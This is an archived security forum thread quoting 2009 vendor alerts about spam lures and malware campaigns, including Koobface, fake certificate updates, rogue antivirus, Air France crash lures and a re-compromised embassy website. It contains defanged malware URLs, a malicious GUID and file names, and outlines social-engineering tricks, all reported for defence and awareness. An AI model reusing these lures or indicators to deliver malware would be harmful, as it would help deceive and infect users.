SPAM frauds, fakes, and other MALWARE deliveries - archive

[AplusWebMaster]

More on same...

Koobface... again
- http://securitylabs.websense.com/con...erts/3403.aspx
05.26.2009 - "... Koobface attempted another running campaign on Facebook. If infected, Facebook users start to spam their friends with a link to a malicious Web site. When users visit the link, they are redirected various malicious and phishing pages. We detected these on numerous .be domains and TinyURL links. One such malicious page is a fake YouTube page that appears to be a funny video. The page tells visitors to to upgrade their Flash player in order to play the video, and the Flash setup program is actually Koobface malware... Among other things, a proxy server is installed on the infected computer..."

(Screenshots available at the Websense URL above.)

[AplusWebMaster]

FYI...

Another "Digital Certificate" malware campaign
- http://isc.sans.org/diary.html?storyid=6499
Last Updated: 2009-06-01 16:21:12 UTC - "... a "Bank of America Digital Certificate Updating" scheme is used, where a victim of the luring email is directed to a fake website... Using the <Update Certificate> button here will net you a piece of Malware that has approximately 30% AV coverage (as indicated by VirusTotal). A quick analysis of said malware shows probable signs of, suprise-suprise, Waledac..."

(Screenshot available at the URL above.)

[AplusWebMaster]

FYI...

- http://www.theregister.co.uk/2009/06..._malware_scam/
2 June 2009 - "Twitter users over the weekend were the target of a scam that tried to infect them with rogue anti-virus software and other malware, in what is one of the first times the micro-blogging site has been hit by a known for-profit attack, a security researcher said. The problem started after a flurry of tweets directed users to a website promising "Best Video." The site appeared to offer content from YouTube, but behind the scenes, the site delivered a PDF document designed to infect those using vulnerable versions of Adobe's Reader program. Victims then received an urgent warning that their systems were infected and needed to cleaned using fraudulent security software... The scam promoted a piece of rogue anti-virus software dubbed System Security."

- http://www.viruslist.com/en/weblog?weblogid=208187734
June 01, 2009 - "... fake program called "System Security" is being promoted... Most likely the cyber criminals behind this attack simply used the stolen credentials of those phished accounts to tweet the messages... If the trends we've seen on other social platforms are any indicator for Twitter then we can only expect an increase in attacks."
(Screenshots available at the URL above.)

- http://pandalabs.pandasecurity.com/a...ds-Attack.aspx
11 June 09 - "... cyber criminals have been targeting Twitter users by creating thousands of messages (tweets) embedded with words involving trending topics and malicious URLs. If the URLs were accessed, the victims would arrive at a rogueware website designed to trick them into thinking that their computer is infected, therefore justifying the need to purchase the fake software offered. Since the initial discovery, we have been keeping a close eye on this attack, but the malicious tweets continue... The ease of carrying out this type of attack leaves us to believe that this will not go away anytime soon... "

[AplusWebMaster]

FYI...

- http://www.marshal8e6.com/trace/i/FT...race.1003~.asp
June 8, 2009 - "Last week the US Federal Trace Commission shut down a rogue ISP because it hosted a range of botnet command and control servers, malware, and child pornography. The ISP, known as 3FN (also as APS Telecom) was thought to be responsible for a number of spam botnet control servers, notably Pushdo/Cutwail... did this shutdown have any impact on spam? Looking at our Spam Statistics from last week, we do see a dip down of about 15% in our Spam Volume Index (SVI)... And spam originating from the Pushdo botnet indeed seems to be affected. The proportion of spam from Pushdo has dipped, along with Mega-D. Rustock seems completely unaffected... spam from Pushdo is still coming in to our spam traps, but at a much reduced rate... In terms of its impact on spam, the event is not quite in the same league as the McColo shutdown last November when spam output was halved overnight, but it is still very welcome nonetheless..."

(Charts available at the URL above.)

[AplusWebMaster]

FYI...

More Blackhat SEO "scareware" campaigns
- http://ddanchev.blogspot.com/2009/06...nt-end-to.html
June 08, 2009 - "... they've got no customers but the cybercriminals themselves maintaining a portfolio of over 7,000 adult related keywords which they have been using for blackhat SEO campaigns across thousands of automatically registered - CAPTCHA recognition outsourced - Blogspot accounts since February, 2009... Not only is life4info .info or dirsite .com a bogus free hosting provider, but the campaigns hosted by them are interacting with our "dear friends" at AS30407; VELCOM .com which Spamhaus describes as "N. American base of Ukrainian cybercrime spammers" - and with a reason."

(Screenshots and more detail available at the URL above.)

[AplusWebMaster]

FYI...

Malicious SPAM - Air France plane crash
- http://securitylabs.websense.com/con...erts/3417.aspx
06.11.2009 - "Websense... has detected a new malicious spam campaign pretending to deliver legitimate news updates about the Air France plane crash ( http://news.bbc.co.uk/1/hi/world/americas/8078147.stm ). The spam campaign is in Portuguese, and includes a link to view the first videos from the crash site. The link to the video leads to a Trojan Downloader file named: Video_AirFrance_447.com. If a user runs the file, it downloads a malicious executable file masquerading as an image from [removed].org/imgs/like2.jpg. The malware registers a password-stealing BHO component on the system masquerading as a McAfee SiteAdvisor component with this GUID: {9387b8b2-5508-11de-8729-c56f55d89593}. The GUID is linked to the malicious installed DLL file named mcieplg.dll under the system32 directory (%windir%\system32\mcieplg.dll). AV detection rates on this file are very low*..."
* http://www.virustotal.com/analisis/c...914-1244673584

(Screenshots available at the Websense URL above.)

[AplusWebMaster]

FYI...

- https://forums2.symantec.com/t5/blog...article-id/276
06-12-2009 - "... SPAM (message) noted that Symantec was working with Microsoft to create a patch for "Conflicker." According to the spam message, Conficker is also called "Troj/Brisv.A"... The spam is accompanied by a file named "remtool_conf.exe." The spammers have taken an extra step ahead of just spreading their Trojans. This file is actually a Symantec fixtool for Trojan.Brisv bundled with the Trojan. So, when someone runs this file they actually run the Symantec Brisv fixtool, along with the Trojan completing its task. In this case, the dropped Trojan contacts a remote site in order to download another piece of malware, which is currently detected by Symantec products as Suspicious.MH690.A... We gave the infection a run on a test machine. Almost immediately we saw our own EULA... Running the email attachment did a few things–it dropped the original (signed) Symantec Trojan.Brisv fixtool into a temporary folder; it dropped a Trojan into the same folder; and, it ran the original fixtool. One can see that this is indeed Symantec’s own legitimate fixtool. But, the Trojan file "webexplorer.exe" is basically a downloader. It contacts a remote site in order to download another file called "winupdate.exe". As you’ve guessed, that is also a Trojan and is currently detected as Suspicious.MH690.A... If you have a need to run a Symantec fixtool, go to the Symantec website* and download it for free..."
* http://www.symantec.com/business/sec...movaltools.jsp

(Screenshots available at the first Symantec URL above.)

[AplusWebMaster]

FYI...

- https://forums2.symantec.com/t5/blog...article-id/200
06-15-2009 - "It may not be encouraging news for scammers, but users are slowly but surely adopting a see-and-delete approach for the usual fake stories related to lotteries, dormant bank accounts, an inheritance of huge wealth, and relatives of deceased or exiled political leaders sharing their millions. However, lately the trends seem to show that news stories involving current events are being piggybacked or manipulated by scammers to trap users into falling for fraudulent offers... Another recent scam we have been monitoring involves an event resembling the highly rated television reality show Big Brother, which began on June 4 in the UK. Scammers have been inviting recipients to participate in their Big Brother World to be held on July 12 in London, UK... Scammers claim to be a Big Brother agent and will furnish the competition details once users respond to the mailed invitation. Users will need to reply with the application type along with their full name, address, age, and telephone number. Even a casual look at the email reveals several spelling mistakes that start right from the subject line and continue on throughout the message, including using “price” instead of “prize” in the mail body. We would recommend that users follow the usual practice of ignoring [and deleting] such unsolicited emails..."

(Screenshot of scam e-mail available at the URL above.)

[AplusWebMaster]

FYI...

- http://blog.trendmicro.com/air-franc...point-exploit/
June 17, 2009 - "After a blackhat SEO attack, cybercriminals are again using the terrifying catastrophe of Air France Flight 447 or about China-made C919 Jumbo Jets competing with Airbus and Boeing for malicious intent. This time, spam messages are sent with an attached PowerPoint presentation, which is specially crafted to exploit a vulnerability in Microsoft Powerpoint*. The spammed emails suggest that there are images in the attached PowerPoint presentation related to both the China-made jumbo jets and the Air France Flight 447, in order to lure the user into opening the specially crafted file... Users are strongly advised to apply the patch* provided by Microsoft to avoid being victimized by this threat..."
* http://www.microsoft.com/technet/sec.../ms09-017.mspx

[AplusWebMaster]

FYI...

Nonstop site re-infections
- http://securitylabs.websense.com/con...logs/3425.aspx
06.24.2009 - "We recently published an alert* about the Ethiopian Embassy site being compromised... This isn't the first time the site has been compromised. In March of 2009, we noticed an iframe injection pointing to hxxp://[REMOVED]vv.com/index.php. The domain was also serving virus-infected files in other locations, including hxxp://[REMOVED]vv.com/unic/1.exe, a Trojan [see VirusTotal report**]... Attackers are in control and re-compromising the site over and over, potentially infecting visitors with malicious code at any time. These attacks are somewhat of a trend. We've documented a number of compromised embassy sites in the past, illustrating how malware delivery occurs through Web sites..."
* http://securitylabs.websense.com/con...erts/3423.aspx

** http://www.virustotal.com/analisis/9...5a9-1240536959
"File 5143155606c013934a4601648e310800aff688c2.EXE ..."

(Screenshots and more detail available at the Websense URL above.)